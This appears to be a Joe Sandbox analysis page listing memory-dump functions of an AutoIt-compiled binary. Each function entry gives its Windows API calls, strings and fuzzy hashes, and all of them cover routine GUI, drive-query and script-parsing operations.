Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: c242bffe38a1c5c3f36794229f67042679e8d786ec6a9f618404752b5d809c54
Instruction ID: ebda1d4d354c488811d2c17919f666adfaa9fda1383fe0040badda4400c8fac1
Opcode Fuzzy Hash: c242bffe38a1c5c3f36794229f67042679e8d786ec6a9f618404752b5d809c54
Instruction Fuzzy Hash: 4812C034521202DFDB11DF24C888B69B7E5FF45302F64416AE856DB6A2C731EC69CFA4

Function 002C74AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 002C74DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 002C759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 002C75DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 002C75ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 002C7633
GetClientRect.USER32(00000000,?), ref: 002C763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 002C7683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 002C7692
GetStockObject.GDI32(00000011), ref: 002C76A2
SelectObject.GDI32(00000000,00000000), ref: 002C76A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 002C76B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 002C76BF
DeleteDC.GDI32(00000000), ref: 002C76C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 002C76F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 002C770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 002C7746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 002C775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 002C776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 002C779B
GetStockObject.GDI32(00000011), ref: 002C77A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 002C77B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 002C77BB

Strings

msctls_progress32, xrefs: 002C773C
AutoIt v3, xrefs: 002C762B
DISPLAY, xrefs: 002C7688
static, xrefs: 002C767D, 002C7795

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 9c08ddbf9105c8058b0192e1e0ffd6992f06f902025bb11f2ef9fa021098902a
Instruction ID: 12df6ca57fc863ee08750bd613c75d1ad11997fceaa9114c7996f4293797bed1
Opcode Fuzzy Hash: 9c08ddbf9105c8058b0192e1e0ffd6992f06f902025bb11f2ef9fa021098902a
Instruction Fuzzy Hash: EEA19D71A10615FFEB10DBA4DD4AFAEBBA9EB48710F008215FA15A72E0C770AD11CF64

Function 002BAD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 002BAD1E
GetDriveTypeW.KERNEL32(?,002DFAC0,?,\\.\,002DF910), ref: 002BADFB
SetErrorMode.KERNEL32(00000000,002DFAC0,?,\\.\,002DF910), ref: 002BAF59

Strings

Removable, xrefs: 002BAE4D
Network, xrefs: 002BAE39
RAMDisk, xrefs: 002BAE25
Virtual, xrefs: 002BAF21
SCSI, xrefs: 002BAEC6
1394, xrefs: 002BAEDB
MMC, xrefs: 002BAF1A
FileBackedVirtual, xrefs: 002BAF28
SSD, xrefs: 002BAE86
ATA, xrefs: 002BAED4
SAS, xrefs: 002BAF05
Fibre, xrefs: 002BAEE9
SATA, xrefs: 002BAF0C
\\.\, xrefs: 002BAD70
CDROM, xrefs: 002BAE2F
Unknown, xrefs: 002BAE1B, 002BAEBF
SSA, xrefs: 002BAEE2
iSCSI, xrefs: 002BAEFE
RAID, xrefs: 002BAEF7
PhysicalDrive, xrefs: 002BADA7
USB, xrefs: 002BAEF0
ATAPI, xrefs: 002BAECD
Fixed, xrefs: 002BAE43

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 5c9481c8ffd84b0e04a4078ff463f9fe635480ff204a9c97b8b8fc0677206dda
Instruction ID: edc7689b18a49d86f7cd628ba1cc8f430127864ab9cbce9cf9b914c8436375b3
Opcode Fuzzy Hash: 5c9481c8ffd84b0e04a4078ff463f9fe635480ff204a9c97b8b8fc0677206dda
Instruction Fuzzy Hash: F751B5B0675306DBCB01DF14C962CFD73A0EB087817244066F887A7AD1CA729D65DB96

Function 002568DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00256931
__wcsnicmp.LIBCMT ref: 00256949
__wcsnicmp.LIBCMT ref: 00256961
__wcsnicmp.LIBCMT ref: 00256979
__wcsnicmp.LIBCMT ref: 00256991
__wcsnicmp.LIBCMT ref: 002569A9
__wcsnicmp.LIBCMT ref: 002569C1
__wcsnicmp.LIBCMT ref: 002569D5
__wcsnicmp.LIBCMT ref: 00256A16
__wcsnicmp.LIBCMT ref: 00256A2A
__wcsnicmp.LIBCMT ref: 00256A3E
__wcsnicmp.LIBCMT ref: 00256A52

Strings

Bad directive syntax error, xrefs: 0028E31A
#requireadmin, xrefs: 0025695B
#notrayicon, xrefs: 00256943
#pragma compile, xrefs: 0025692B
#comments-end, xrefs: 00256A38
#cs, xrefs: 002569CF, 00256A24
#ce, xrefs: 00256A4C
#include-once, xrefs: 0025698B
#OnAutoItStartRegister, xrefs: 00256973
#include, xrefs: 002569A3
Unterminated group of comments, xrefs: 0028E403
Cannot parse #include, xrefs: 0028E3F0
#comments-start, xrefs: 002569BB, 00256A10

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 9a56b1dfc3c6b4e3a3229e6b5c54a1ad6febfbdbdeb1ca1757a233647253e4fe
Instruction ID: 629e8706de003dc01948c8c634ee9b3119db3184fc5907d0812bc4a68cef3837
Opcode Fuzzy Hash: 9a56b1dfc3c6b4e3a3229e6b5c54a1ad6febfbdbdeb1ca1757a233647253e4fe
Instruction Fuzzy Hash: 3B8136B0671206AADF20BE60DC46FBB7768AF15701F444025FC056B1D2EB70DE79DAA8

Function 002D9A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 002D9AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 002D9B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 002D9BA7

Strings

0, xrefs: 002D9BE4

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: e002e39e470b65877d2eafd977ed7935c623743cd7bc7fd5b001d1a37159dd46
Instruction ID: abcc64aa75186a53e64df0cd74c121f5c5dae48da3f3c262ee848487fc83fb77
Opcode Fuzzy Hash: e002e39e470b65877d2eafd977ed7935c623743cd7bc7fd5b001d1a37159dd46
Instruction Fuzzy Hash: F302CE31225202AFD725CF14C848BAABBE5FF49314F04852FF999963A1C774DDA4CB92

Function 002DA8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 002DA903
SetTextColor.GDI32(?,?), ref: 002DA907
GetSysColorBrush.USER32(0000000F), ref: 002DA91D
GetSysColor.USER32(0000000F), ref: 002DA928
CreateSolidBrush.GDI32(?), ref: 002DA92D
GetSysColor.USER32(00000011), ref: 002DA945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 002DA953
SelectObject.GDI32(?,00000000), ref: 002DA964
SetBkColor.GDI32(?,00000000), ref: 002DA96D
SelectObject.GDI32(?,?), ref: 002DA97A
InflateRect.USER32(?,000000FF,000000FF), ref: 002DA999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002DA9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 002DA9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 002DA9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 002DAA14
InflateRect.USER32(?,000000FD,000000FD), ref: 002DAA32
DrawFocusRect.USER32(?,?), ref: 002DAA3D
GetSysColor.USER32(00000011), ref: 002DAA4B
SetTextColor.GDI32(?,00000000), ref: 002DAA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 002DAA67
SelectObject.GDI32(?,002DA5FA), ref: 002DAA7E
DeleteObject.GDI32(?), ref: 002DAA89
SelectObject.GDI32(?,?), ref: 002DAA8F
DeleteObject.GDI32(?), ref: 002DAA94
SetTextColor.GDI32(?,?), ref: 002DAA9A
SetBkColor.GDI32(?,?), ref: 002DAAA4

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 510dbab62e4a4dfde0a2c26f230af23299dbc926328ec1b9204f2b424ccf2206
Instruction ID: 89429239170d5c2f248fbfb9c8cfe1eae23cff1f8f3d75e6c725f46cdc74606d
Opcode Fuzzy Hash: 510dbab62e4a4dfde0a2c26f230af23299dbc926328ec1b9204f2b424ccf2206
Instruction Fuzzy Hash: 75515F71D01209EFDB109FA4ED48E9E7BB9EB08320F158226F916AB2A1D7719D50CF94

Function 002D89D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 002D8AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002D8AD2
CharNextW.USER32(0000014E), ref: 002D8B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 002D8B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 002D8B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002D8B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 002D8B86
SetWindowTextW.USER32(?,0000014E), ref: 002D8BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 002D8BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 002D8C1F
_memset.LIBCMT ref: 002D8C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 002D8C8D
_memset.LIBCMT ref: 002D8CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 002D8D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 002D8D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 002D8E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 002D8E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002D8E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002D8EB4
DrawMenuBar.USER32(?), ref: 002D8EC3
SetWindowTextW.USER32(?,0000014E), ref: 002D8EEB

Strings

0, xrefs: 002D8E55

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 6efb5d249fefb386085df5ca9e6d0888f7aeea3a0e6e2dc6c7d98573e984a55d
Instruction ID: 43b34374f7004898a1010dece04866767b4aeb9b306bfc96badd74edeef7c732
Opcode Fuzzy Hash: 6efb5d249fefb386085df5ca9e6d0888f7aeea3a0e6e2dc6c7d98573e984a55d
Instruction Fuzzy Hash: BBE17F71921209EFDB219F64CC88EEE7B79EF09710F108157F915AA290DB709DA4DF60

Function 002D488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 002D49CA
GetDesktopWindow.USER32 ref: 002D49DF
GetWindowRect.USER32(00000000), ref: 002D49E6
GetWindowLongW.USER32(?,000000F0), ref: 002D4A48
DestroyWindow.USER32(?), ref: 002D4A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002D4A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002D4ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 002D4AE1
SendMessageW.USER32(?,00000421,?,?), ref: 002D4AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 002D4B09
IsWindowVisible.USER32(?), ref: 002D4B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 002D4B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 002D4B58
GetWindowRect.USER32(?,?), ref: 002D4B70
MonitorFromPoint.USER32(?,?,00000002), ref: 002D4B96
GetMonitorInfoW.USER32(00000000,?), ref: 002D4BB0
CopyRect.USER32(?,?), ref: 002D4BC7
SendMessageW.USER32(?,00000412,00000000), ref: 002D4C32

Strings

(, xrefs: 002D4BA3
tooltips_class32, xrefs: 002D4A96
0, xrefs: 002D4975

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 169437d293c61637b9639eac92049565e24a5d827386cf138bea263cab1f38b5
Instruction ID: 931c114ef43d5f68b21ecbf5b5706b77e9e5289d050669e2a34897bd4cfc17c8
Opcode Fuzzy Hash: 169437d293c61637b9639eac92049565e24a5d827386cf138bea263cab1f38b5
Instruction Fuzzy Hash: FBB19C70624341AFDB04EF64D948B5ABBE4FF88304F00891EF99A9B2A1D770EC55CB95

Function 002B449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 002B44AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 002B44D2
_wcscpy.LIBCMT ref: 002B4500
_wcscmp.LIBCMT ref: 002B450B
_wcscat.LIBCMT ref: 002B4521
_wcsstr.LIBCMT ref: 002B452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 002B4548
_wcscat.LIBCMT ref: 002B4591
_wcscat.LIBCMT ref: 002B4598
_wcsncpy.LIBCMT ref: 002B45C3

Strings

04090000, xrefs: 002B457E
%u.%u.%u.%u, xrefs: 002B4626
\VarFileInfo\Translation, xrefs: 002B4540
DefaultLangCodepage, xrefs: 002B45AB
StringFileInfo\, xrefs: 002B451B

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: f7ff4e8f2b48573e19cb35fb6270ea22aaedbdfbbb6445a4c5f87437c38f3fc6
Instruction ID: 5775ffc8adef33cc0d7214739a064a384370044d56df71e578a5bff9126e448a
Opcode Fuzzy Hash: f7ff4e8f2b48573e19cb35fb6270ea22aaedbdfbbb6445a4c5f87437c38f3fc6
Instruction Fuzzy Hash: 67412A31920205BBDB10FB749C47EFF776CDF45750F044066F909A6183EB319A219BA9

Function 002527D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002528BC
GetSystemMetrics.USER32(00000007), ref: 002528C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002528EF
GetSystemMetrics.USER32(00000008), ref: 002528F7
GetSystemMetrics.USER32(00000004), ref: 0025291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00252939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00252949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0025297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00252990
GetClientRect.USER32(00000000,000000FF), ref: 002529AE
GetStockObject.GDI32(00000011), ref: 002529CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 002529D5

Part of subcall function 00252344: GetCursorPos.USER32(?), ref: 00252357
Part of subcall function 00252344: ScreenToClient.USER32(003157B0,?), ref: 00252374
Part of subcall function 00252344: GetAsyncKeyState.USER32(00000001), ref: 00252399
Part of subcall function 00252344: GetAsyncKeyState.USER32(00000002), ref: 002523A7

SetTimer.USER32(00000000,00000000,00000028,00251256), ref: 002529FC

Strings

AutoIt v3 GUI, xrefs: 00252974

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: f518047f301cc94ff8c3a2e561d72c48a66b6ba391415e6904efadd29247be3f
Instruction ID: b0c597b3ceb003c0b3363cce3e122b74369fc4e1876c3e40520653926271a8c2
Opcode Fuzzy Hash: f518047f301cc94ff8c3a2e561d72c48a66b6ba391415e6904efadd29247be3f
Instruction Fuzzy Hash: ECB1AD31A1120ADFDB15DFA8DD89BED7BA4FB48311F108129FA16A62D0DB70D864CB64

Function 002AA439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 002AA47A
__swprintf.LIBCMT ref: 002AA51B
_wcscmp.LIBCMT ref: 002AA52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 002AA583
_wcscmp.LIBCMT ref: 002AA5BF
GetClassNameW.USER32(?,?,00000400), ref: 002AA5F6
GetDlgCtrlID.USER32(?), ref: 002AA648
GetWindowRect.USER32(?,?), ref: 002AA67E
GetParent.USER32(?), ref: 002AA69C
ScreenToClient.USER32(00000000), ref: 002AA6A3
GetClassNameW.USER32(?,?,00000100), ref: 002AA71D
_wcscmp.LIBCMT ref: 002AA731
GetWindowTextW.USER32(?,?,00000400), ref: 002AA757
_wcscmp.LIBCMT ref: 002AA76B

Part of subcall function 0027362C: _iswctype.LIBCMT ref: 00273634

Strings

%s%u, xrefs: 002AA515

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 4598033d8bc6e0b6f8ea17cdf98f5eb8fb0d29a3514253ac0fdd07d325216914
Instruction ID: 5a79f4e485a70296eaf2bebec0938a50f5e893e24e46e69c8366e8615f7cac7c
Opcode Fuzzy Hash: 4598033d8bc6e0b6f8ea17cdf98f5eb8fb0d29a3514253ac0fdd07d325216914
Instruction Fuzzy Hash: A7A1BF71624207ABDB15DF60CC84BAAF7E8FF45354F00852AF99AD2190DB30E965CB92

Function 002AAED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 002AAF18
_wcscmp.LIBCMT ref: 002AAF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 002AAF51
CharUpperBuffW.USER32(?,00000000), ref: 002AAF6E
_wcscmp.LIBCMT ref: 002AAF8C
_wcsstr.LIBCMT ref: 002AAF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 002AAFD5
_wcscmp.LIBCMT ref: 002AAFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 002AB00C
GetClassNameW.USER32(00000018,?,00000400), ref: 002AB055
_wcscmp.LIBCMT ref: 002AB065
GetClassNameW.USER32(00000010,?,00000400), ref: 002AB08D
GetWindowRect.USER32(00000004,?), ref: 002AB0F6

Strings

@, xrefs: 002AAEF9
ThumbnailClass, xrefs: 002AAFE0, 002AB060

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
